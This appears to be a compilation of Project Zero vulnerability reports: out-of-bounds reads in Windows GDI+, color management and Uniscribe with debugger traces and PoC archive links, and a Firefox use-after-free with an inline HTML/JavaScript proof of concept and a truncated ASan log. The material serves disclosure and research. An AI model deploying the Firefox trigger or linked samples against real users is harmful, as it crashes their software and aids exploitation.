We have encountered a crash in the Windows GDI+ library, in the gdiplus!GetRECTSForPlayback function, while trying to display a malformed EMF+ image file:

---
(6be8.6f1c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=ffffadd6 ecx=000c1000 edx=00000000 esi=0000348f edi=00000000
eip=6c83a189 esp=0023f21c ebp=0023f238 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
gdiplus!GetRECTSForPlayback+0xe2:
6c83a189 8a11            mov     dl,byte ptr [ecx]          ds:002b:000c1000=??
0:000> kb
ChildEBP RetAddr  Args to Child              
0023f238 6c83c8a3 000001e0 00000018 00000800 gdiplus!GetRECTSForPlayback+0xe2
0023f294 6c8387e3 07b6bcb0 0000403a 00008800 gdiplus!SetTSClipEPR::Play+0x71
0023f2b4 6c83a88d 0000403a 00008800 00000018 gdiplus!GdipPlayMetafileRecordCallback+0x35
0023f2e4 6c83e32c 00000278 000c013c 000c0000 gdiplus!MetafilePlayer::EnumerateEmfPlusRecords+0x73
0023f2fc 76cd58a4 070125f7 04e18ff8 000c0098 gdiplus!EnumEmfWithDownLevel+0x61
0023f388 6c83abb4 070125f7 403581b3 6c83e2cb GDI32!bInternalPlayEMF+0x6a3
0023f3c0 6c83e5b1 070125f7 08462d83 0023f440 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
0023f460 6c83f592 42776037 08462d83 0023f598 gdiplus!GpGraphics::EnumEmfPlusDual+0x1e7
0023f5b0 6c8448c9 00000000 42cc0000 42d80000 gdiplus!GpMetafile::EnumerateForPlayback+0x778
0023f6ac 6c84494d 07b65f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
0023f710 6c80e03f 07b65f28 0023f738 0023f748 gdiplus!GpGraphics::DrawImage+0x51
0023f778 6c80e0d3 07b61d28 4269b097 00000000 gdiplus!GdipDrawImage+0x130
0023f7a4 000e1747 07b61d28 07b65f28 00000000 gdiplus!GdipDrawImageI+0x49
[...]
---

The crash appears to be caused by insufficient validation of the record size in relation to the number of declared rectangles, in the handler of the EmfPlusSetTSClip EMF+ record. It is unclear if the bug can also lead to memory corruption (likely not), but it could still potentially lead to the disclosure of junk/out-of-bounds heap bytes.

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).

Attached is an archive with two samples, which trigger crashes at two different offsets within the gdiplus!GetRECTSForPlayback function.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41656.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1052

We have encountered a crash in the Windows Color Management library (icm32.dll), in the icm32!Fill_ushort_ELUTs_from_lut16Tag function, while trying to display a TIFF image with a malformed embedded color profile:

---
(7c1c.93b0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0028f0dc ecx=0984f7c0 edx=00006ff0 esi=0980f800 edi=00000100
eip=6ac4f701 esp=0028ecc8 ebp=0028ecf4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
icm32!Fill_ushort_ELUTs_from_lut16Tag+0xe4:
6ac4f701 0fb711          movzx   edx,word ptr [ecx]       ds:002b:0984f7c0=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0028ecf4 6ac495bd 0028f0dc ff837f84 00004000 icm32!Fill_ushort_ELUTs_from_lut16Tag+0xe4
0028ed28 6ac4b117 0028f0dc 0028ef54 00002100 icm32!ExtractElutFromLut16+0xec
0028ed80 6ac4ca1d 0028f0dc 0028ef54 41324230 icm32!ExtractAll_MFT_LutsFromLut16+0x10a
0028edac 6ac4ccbf 0028f0dc 0028ef54 41324230 icm32!ExtractAll_MFT_Luts+0x8c
0028ee3c 6ac4d562 0028f0dc 0028ef54 00000000 icm32!ExtractAllLuts+0x257
0028f148 6ac4e947 0953ee58 09534ff0 061f7f70 icm32!CreateCombi+0x725
0028f2ec 6ac43c84 0953ee58 09534ff0 00000000 icm32!PrepareCombiLUTs+0x3a6
0028f498 6ac42dba 0953ee58 09534ff0 09534ff0 icm32!CMMConcatInitPrivate+0x23e
0028f4b4 6ac41630 0028f520 09534ff0 0028f5c4 icm32!CWConcatColorWorld4MS+0x42
0028f4e0 6ac41fce 0028f520 00180002 00000000 icm32!CMCreateMultiProfileTransformInternal+0x10b
0028f508 6c5ec8af 0028f5bc 00000002 0028f5c4 icm32!CMCreateMultiProfileTransform+0x20
0028f57c 6d2fd7c8 0028f5bc 00000002 0028f5c4 mscms!CreateMultiProfileTransform+0x22d
0028f5a0 6d2fb62c 0028f5bc 0028f5c4 00000000 WindowsCodecsExt!ICMModule::CreateMultiProfileTransform+0x27
0028f5d4 6d2f58cd 06277f90 40c8e2f0 40cf42f0 WindowsCodecsExt!CIcmColorTransform::CreateVectorTransform+0x6f
0028f640 69b25e74 09744f88 0970afac 0028f6b4 WindowsCodecsExt!CFormatConverterNChannel::Initialize+0x4b2
0028f6d8 6c8ea4be 0970cf90 0970afac 0028f710 WindowsCodecs!CFormatConverterResolver::Initialize+0x318
0028f724 6c8ec909 0010300c 00000000 07b67f68 gdiplus!GpWicDecoder::InitFormatConverter+0x7e
0028f760 6c8e9d72 00000000 07b55fd0 07b4df98 gdiplus!GpWicDecoder::DecodeFrame+0xb5
0028f774 6c8ddeb8 07b67f68 07b4df98 07b4df98 gdiplus!GpWicDecoder::GetImageInfo+0x29
0028f798 6c8de328 07b4df98 0000027f 07b4df38 gdiplus!GpDecodedImage::InternalGetImageInfo+0x3f
0028f7b8 6c830aee 07b55fd0 07b4df98 07b4bcd8 gdiplus!GpDecodedImage::GetImageInfo+0x18
0028f7cc 6c832cd3 0028f880 0028f7e8 6c83330d gdiplus!CopyOnWriteBitmap::CopyOnWriteBitmap+0x48
0028f7d8 6c83330d 0028f880 07b45f28 0028f7f8 gdiplus!CopyOnWriteBitmap::Create+0x1d
0028f7e8 6c8342aa 0028f880 07b43ff4 0028f81c gdiplus!GpBitmap::GpBitmap+0x2c
0028f7f8 6c803e8d 0028f880 085a1000 07b43ff0 gdiplus!GpImage::LoadImageW+0x69
0028f81c 003b171f 0028f880 07b43ff4 b2121dcf gdiplus!GdipLoadImageFromFile+0x74
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).

Attached is a TIFF file which triggers the crash.

################################################################################

A similar crash with a slightly different stack trace was also encountered in the icm32!Fill_byte_ALUTs_from_lut16Tag function:

---
(62a8.4d70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000001fe ebx=09222000 ecx=09220ffe edx=00000801 esi=000003fc edi=0924d3f8
eip=6ac4f821 esp=002bf594 ebp=002bf5b8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
icm32!Fill_byte_ALUTs_from_lut16Tag+0x9a:
6ac4f821 0fb711          movzx   edx,word ptr [ecx]       ds:002b:09220ffe=????
0:000> kb
ChildEBP RetAddr  Args to Child              
002bf5b8 6ac4aa4d 002bf9a0 00000801 0924d3f8 icm32!Fill_byte_ALUTs_from_lut16Tag+0x9a
002bf5ec 6ac4b0f3 0002a000 002bf818 00007000 icm32!ExtractAlutFromLut16+0xe2
002bf644 6ac4ca1d 002bf9a0 002bf818 42324130 icm32!ExtractAll_MFT_LutsFromLut16+0xe6
002bf670 6ac4cd0d 002bf9a0 002bf818 42324130 icm32!ExtractAll_MFT_Luts+0x8c
002bf700 6ac4d562 002bf9a0 002bf818 00000000 icm32!ExtractAllLuts+0x2a5
002bfa0c 6ac4e947 07c46e58 07c44fe8 07c48ef8 icm32!CreateCombi+0x725
002bfbb0 6ac43c84 07c46e58 07c44fe8 00000000 icm32!PrepareCombiLUTs+0x3a6
002bfd5c 6ac42dba 07c46e58 07c44fe8 07c44fe8 icm32!CMMConcatInitPrivate+0x23e
002bfd78 6ac41630 002bfde4 07c44fe8 002bfea8 icm32!CWConcatColorWorld4MS+0x42
002bfda4 6ac41fce 002bfde4 00080000 00000000 icm32!CMCreateMultiProfileTransformInternal+0x10b
002bfdcc 6c5ec8af 002bfe98 00000004 002bfea8 icm32!CMCreateMultiProfileTransform+0x20
002bfe40 011c1923 002bfe98 00000004 002bfea8 mscms!CreateMultiProfileTransform+0x22d
[...]
---

Attached is a color profile which triggers the above crash. In order to reproduce it, it is necessary to use a dedicated program which loads the file and creates a color transform.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41657.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1053

We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!ScriptApplyLogicalWidth function, while trying to display a malformed EMF file:

---
(920c.9190): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001e6fe4 ebx=00000000 ecx=00000007 edx=00000000 esi=00000007 edi=00000007
eip=751e6f3c esp=002ef0c8 ebp=002ef0ec iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
USP10!ScriptApplyLogicalWidth+0x10c:
751e6f3c 8b04b8          mov     eax,dword ptr [eax+edi*4] ds:002b:001e7000=????????
0:000> kb
ChildEBP RetAddr  Args to Child              
002ef0ec 751f4039 001e6fe4 0000008f 0000008f USP10!ScriptApplyLogicalWidth+0x10c
002ef140 751f435d 00000105 002ef170 0a6a1cbc USP10!ApplyPiDxToItem+0x89
002ef184 751e7a04 ffffffff 00000004 000000a0 USP10!ScriptStringAnalyzeGlyphs+0x20d
002ef19c 76ca5465 1d011f2d 0a6a1bd8 00001000 USP10!ScriptStringAnalyse+0x284
002ef1e8 76ca3a3d 1d011f2d 0935f000 00001000 LPK!LpkStringAnalyse+0xe5
002ef238 76ca3af2 1d011f2d 00000064 00000064 LPK!InternalTextOut+0x1cd
002ef26c 76ccda50 1d011f2d 00000064 00000064 LPK!LpkExtTextOut+0x32
002ef7d8 76ccda90 1d011f2d 00000064 00000064 GDI32!ExtTextOutInternalA+0x3aa
002ef804 76ce7fed 1d011f2d 00000064 00000064 GDI32!ExtTextOutA+0x24
002ef838 76cd50cd 1d011f2d 04ed8ff8 00000002 GDI32!MREXTTEXTOUT::bPlay+0x7f
002ef8b0 6c85fc37 1d011f2d 04ed8ff8 001e01e8 GDI32!PlayEnhMetaFileRecord+0x2c5
002ef8c8 6c860e3a 00000053 07bdbcb0 00006044 gdiplus!EmfEnumState::PlayRecord+0x3a
002ef8e0 6c83881a 00000053 00006044 001e01f0 gdiplus!EmfEnumState::ProcessRecord+0xb1
002ef8fc 6c8389e0 00000053 00000000 00006044 gdiplus!GdipPlayMetafileRecordCallback+0x6c
002ef924 76cd58a4 1d011f2d 04ed8ff8 001e01f0 gdiplus!EnumEmfDownLevel+0x6e
002ef9b0 6c83abb4 1d011f2d 403581b3 6c838972 GDI32!bInternalPlayEMF+0x6a3
002ef9e8 6c83d317 1d011f2d 924626c1 002efa74 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
002efa90 6c83f3c1 00000000 924626c1 002efbd8 gdiplus!GpGraphics::EnumEmf+0x391
002efbf0 6c8448c9 00000000 00000001 00000001 gdiplus!GpMetafile::EnumerateForPlayback+0x5a7
002efcec 6c84494d 07bd5f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
002efd50 6c80e03f 07bd5f28 002efd78 002efd88 gdiplus!GpGraphics::DrawImage+0x51
002efdb8 6c80e0d3 07bd1d28 438f3857 00000000 gdiplus!GdipDrawImage+0x130
002efde4 013e1747 07bd1d28 07bd5f28 00000000 gdiplus!GdipDrawImageI+0x49
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).

Attached is ane EMF file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41658.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1054

We have encountered a crash in the Windows Color Management library (icm32.dll), in the icm32!LHCalc3toX_Di16_Do16_Lut8_G32 function, while trying to translate colors based on a malformed color profile file:

---
(61e4.8620): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000453 ecx=0922cafd edx=00000c63 esi=0038f7ac edi=0004be40
eip=6ac573e9 esp=0038f6ec ebp=0038f784 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
icm32!LHCalc3toX_Di16_Do16_Lut8_G32+0x32a:
6ac573e9 0fb61411        movzx   edx,byte ptr [ecx+edx]     ds:002b:0922d760=??
0:000> kb
ChildEBP RetAddr  Args to Child              
0038f784 6ac57844 0038f7ac 0038f840 00000000 icm32!LHCalc3toX_Di16_Do16_Lut8_G32+0x32a
0038f798 6ac4807d 0038f7ac 0038f840 76f611a9 icm32!LHCalc3to3_Di16_Do16_Lut8_G32+0x12
0038f8ac 6ac4204c 07b46e58 085f1000 000285c3 icm32!LHMatchColorsPrivate+0xef
0038f8c0 6c5ecab5 00000100 07de1000 000285c3 icm32!CMTranslateColors+0x44
0038f940 011c1963 4f42e2c8 07de1000 000285c3 mscms!TranslateColors+0x108
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it is necessary to use a dedicated program which loads the file, creates a color transform and translates some colors.

Attached are two color profiles which trigger the crash at two different offsets within the icm32!LHCalc3toX_Di16_Do16_Lut8_G32 function.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41659.zip
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1130

Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1340138

There is a use-after-free security vulnerability in Firefox. The vulnerability was confirmed on the nightly ASan build. 

PoC and ASan log can be found below.
Notes for reproducing:
 - PoC uses domFuzzLite3 extension (https://www.squarefree.com/extensions/domFuzzLite3.xpi) in order to trigger the garbage collecor
 - After the PoC is opened, it takes about 10 seconds for the crash to occur

PoC:

=================================================================
-->

<style>
body { display: table }
</style>
<script>
function freememory() {
  try { fuzzPriv.forceGC(); } catch(err) { alert('Please install domFuzzLite3'); }
}
function go() {
  var s = document.getSelection();
  window.find("1",true,false,true,false);
  s.modify("extend","forward","line");
  document.body.append(document.createElement("table"));
  freememory()
}
</script>
<body onload=go()>
<table>
<th>u~Z1Cqn`aA}SOkre=]{</th>
</table>
<progress></progress>

<!--
=================================================================

ASan log:

=================================================================
==119582==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b000214ce8 at pc 0x7f46d6781c12 bp 0x7ffdc29fc1f0 sp 0x7ffdc29fc1e8
READ of size 8 at 0x60b000214ce8 thread T0
    #0 0x7f46d6781c11 in operator! /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:308:36
    #1 0x7f46d6781c11 in IsInSelection /home/worker/workspace/build/src/dom/base/nsRange.h:120
    #2 0x7f46d6781c11 in nsRange::IsNodeSelected(nsINode*, unsigned int, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:202
    #3 0x7f46da800fd3 in nsIFrame::IsSelected() const /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:10107:5
    #4 0x7f46daaa29f6 in nsTableCellFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableCellFrame.cpp:539:11
    #5 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #6 0x7f46daab9bce in nsTableFrame::GenericTraversal(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1212:5
    #7 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
    #8 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #9 0x7f46dab10731 in DisplayRows(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableRowGroupFrame.cpp:231:5
    #10 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
    #11 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #12 0x7f46daab9bce in nsTableFrame::GenericTraversal(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1212:5
    #13 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
    #14 0x7f46daabb382 in nsTableFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1373:3
    #15 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #16 0x7f46dab24b16 in BuildDisplayListForInnerTable /home/worker/workspace/build/src/layout/tables/nsTableWrapperFrame.cpp:207:5
    #17 0x7f46dab24b16 in nsTableWrapperFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableWrapperFrame.cpp:180
    #18 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #19 0x7f46da7912d2 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6585:5
    #20 0x7f46da7890ce in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6677:7
    #21 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #22 0x7f46da7b22f2 in nsCanvasFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:558:5
    #23 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #24 0x7f46da87ebf2 in mozilla::ScrollFrameHelper::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:3497:7
    #25 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #26 0x7f46da735b0a in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:63:5
    #27 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
    #28 0x7f46da990123 in nsSubDocumentFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:471:7
    #29 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
    #30 0x7f46da78d228 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2910:5
    #31 0x7f46dac92672 in nsStackFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsStackFrame.cpp:59:5
    #32 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #33 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #34 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #35 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #36 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #37 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #38 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #39 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #40 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #41 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #42 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #43 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
    #44 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #45 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #46 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #47 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #48 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #49 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #50 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #51 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #52 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #53 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #54 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #55 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #56 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #57 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #58 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
    #59 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #60 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #61 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #62 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #63 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #64 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
    #65 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
